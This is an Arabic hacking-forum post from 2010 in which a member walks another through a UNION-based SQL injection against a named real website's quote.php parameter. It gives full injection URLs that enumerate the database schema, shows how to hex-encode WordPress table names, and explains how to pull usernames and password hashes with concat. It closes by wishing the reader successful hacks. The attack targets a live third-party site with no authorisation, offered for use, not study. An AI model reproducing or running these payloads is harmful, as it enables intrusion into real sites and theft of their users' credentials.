عرض مشاركة واحدة
قديم 02-13-2010, 12:16 AM   رقم المشاركة : 7 (permalink)
معلومات العضو
Dr.NaNo
 
الصورة الرمزية Dr.NaNo
 

 

 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road

Smile


السلام عليكم


اخي اولا ./

كود:
http://qcsgopc.org/quote.php?ID=13+union+select+1,2,3,concat%28table_name,0x3a,column_name,0x3a,table_schema%29,5+from+information_schema.columns+where+column_name%20+like+char%2837,%20112,%2097,%20115,%20115,%2037%29
الى هنا الحقنــة صحيحــة..


ثانيــا يا اخي ..

كود:
http://qcsgopc.org/quote.php?ID=-13+union+select+1,2,3,wp_posts,5+from+james138
هذا غلــــط ككككككككككككككككككككككككككككككككككككككبير

شوف اخي عندما استخرجت اعمدة الباسورد وهي ..


wp_posts:post_password:james138


wp_users:user_pass:james138


طبعـــا انت استخرجتها بالحنقه الاولى وهي هذه .

اقتباس
http://qcsgopc.org/quote.php?ID=13+u...20115,%2037%29

طيب لما ظهرت لك الاعمدة او الجداول هذي .



wp_posts:post_password:james138


wp_users:user_pass:james138


اذهــب فــوررأأأ الى هذا المـــوقــع .. وهو موقع التشفير ..


http://waraxe.us/sql-char-encoder.html


طيب الحين ياغالي تاخذ [ اســم الجدول ] ..

وهذا هو wp_posts او wp_users


اختر واحد فيهم واذهب الى الى موقع التشفير وضعــه في الموقع حتى يتم تشفيره


لكي يستخرج لك عمود اليوزر نيــم ..


وهذه صــورة ياغالي ..







الان عرفنا كيف نشفر .. ^^


طيب انسخ الكلام الي ماشر عليه بالصوره بعد التشفير وضعه بعد الامر هذا ..

where+table_name=#


مثال .:


+where+table_name=0x77705f706f737473


الان انسخ الامر كامل ..مع الكلام الي شفرناهـ ..


واذهب الى الحقنـه هذه ..


اقتباس
http://qcsgopc.org/quote.php?ID=13+u...20115,%2037%29

وامــســح هذا الامر تبع الباسورد


where+column_name +like+char(37, 112, 97, 115, 115, 37)

وضــع هذا الامر ..


+where+table_name=0x77705f706f737473


ولا تنسى ان تضع هذا [ -- ] او iهذا [ /* ] اذا كان الموقع لايقبل ..


وبعد ماتفعل سوف يظهر لك اسم اليوزر ..

وهو post_name

لما يظهر اذهب وضع اسم اليوز في العمود المصاب وسوف يظهر لك اسم صاحب الموقع


او اذا اردت ان يظهر لك الباسورد واليوز مع بعض


اكتب هذا الامر في العمود المصاب ..

Concat(user,0x3a,pass)


ضـع مكان user اسسم اليوزر نيم تبع االموقع الي انت طلعتــه

وضع مكان pass اسم عمود الباسورد الي انت طلعتــه وهو post_password او user_pass



وفي نهايت الرابط ضــع هذا الاسسم


james138


وهو ياتي دايمــا اخر كلمــه


wp_posts:post_password:james138


ثم اضغط انتر وسوف يظهر لك اليوز والباسورد ..


ومن ثم الاختراق ..



أرجــو إنــك فـهــمت شرحــي وانا انصــحك تتابع هذا الفهرس تبع الاخ [ فلكانو جزاه الله خيرأأ ]

وهو فهرس لإختراق المواقع بثغرات SQL وبإذن الله سوف تصبح محترف ياغالي

وهذا رابط الفهرس هنا بالمنتدى ..

http://www.vbspiders.com/vb/t22432.html


تحياتي لك اخــي الغالي

:00001793[1]:وأختراقات موفقــه بإذن الله .. :00001793[1]:





التوقيع

http://www.vbspiders.com/vb/t61978.html

 

   

رد مع اقتباس